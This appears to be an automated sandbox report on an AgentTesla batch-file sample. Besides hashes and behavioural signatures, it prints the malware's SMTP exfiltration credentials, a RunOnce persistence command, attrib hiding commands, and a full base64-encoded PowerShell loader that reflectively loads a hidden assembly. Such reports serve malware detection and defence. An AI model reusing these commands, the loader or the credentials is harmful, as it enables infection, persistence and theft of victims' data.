Analysis
-
max time kernel
93s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-11-2024 19:11
Static task
static1
Behavioral task
behavioral1
Sample
New folder/08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
New folder/08db9ff2e3e0d4b4eae7de9bb07e0fd7c64ed74954e2cf5766fc2e23a0db7d8d.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
New folder/8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat
Resource
win7-20241010-en
Behavioral task
behavioral4
Sample
New folder/8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
New folder/fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat
Resource
win7-20241023-en
Behavioral task
behavioral6
Sample
New folder/fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat
Resource
win10v2004-20241007-en
General
-
Target
New folder/fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat
-
Size
1.2MB
-
MD5
3facdad0ee9326a9fe96750fd6882fec
-
SHA1
e13554f1e181271f441d7ccea3f7df2ae3e47b86
-
SHA256
fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9
-
SHA512
02647213a32a323c4b2328641a1f4969ae30e66d31ca9c1629466b1ee7dfb9cb7abb08c2ab070e60a514f4167e39988eb21ffdf02c33f164e39a942b312e8244
-
SSDEEP
24576:Ldj7jHnhLUJXBLqjfauCZB1wl9UITPPo6jNQQrccVuS8rSE1try6Q+xO7IM:h0XBe20xPg6wxJK
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.hitechmineral.com - Port:
587 - Username:
[email protected] - Password:
parvezhitech1978 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Agenttesla family
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 1 IoCs
Processes:
fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exepid process 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
InstallUtil.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 = "C:\\Users\\Admin\\AppData\\Roaming\\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exedescription pid process target process PID 1764 set thread context of 4904 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe InstallUtil.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exeInstallUtil.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exepid process 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exeInstallUtil.exedescription pid process Token: SeDebugPrivilege 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe Token: SeDebugPrivilege 4904 InstallUtil.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
InstallUtil.exepid process 4904 InstallUtil.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
cmd.exefab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exedescription pid process target process PID 224 wrote to memory of 3620 224 cmd.exe reg.exe PID 224 wrote to memory of 3620 224 cmd.exe reg.exe PID 224 wrote to memory of 4888 224 cmd.exe attrib.exe PID 224 wrote to memory of 4888 224 cmd.exe attrib.exe PID 224 wrote to memory of 1764 224 cmd.exe fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe PID 224 wrote to memory of 1764 224 cmd.exe fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe PID 224 wrote to memory of 1764 224 cmd.exe fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe PID 1764 wrote to memory of 4904 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe InstallUtil.exe PID 1764 wrote to memory of 4904 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe InstallUtil.exe PID 1764 wrote to memory of 4904 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe InstallUtil.exe PID 1764 wrote to memory of 4904 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe InstallUtil.exe PID 1764 wrote to memory of 4904 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe InstallUtil.exe PID 1764 wrote to memory of 4904 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe InstallUtil.exe PID 1764 wrote to memory of 4904 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe InstallUtil.exe PID 1764 wrote to memory of 4904 1764 fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe InstallUtil.exe PID 224 wrote to memory of 2312 224 cmd.exe attrib.exe PID 224 wrote to memory of 2312 224 cmd.exe attrib.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 2312 attrib.exe 4888 attrib.exe -
outlook_office_path 1 IoCs
Processes:
InstallUtil.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe -
outlook_win_path 1 IoCs
Processes:
InstallUtil.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 /d "C:\Users\Admin\AppData\Roaming\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"2⤵
- Adds Run key to start application
PID:3620
-
-
C:\Windows\system32\attrib.exeattrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4888
-
-
C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe"C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgACMAKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAjACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe3⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:4904
-
-
-
C:\Windows\system32\attrib.exeattrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe2⤵
- Views/modifies file attributes
PID:2312
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
Filesize423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82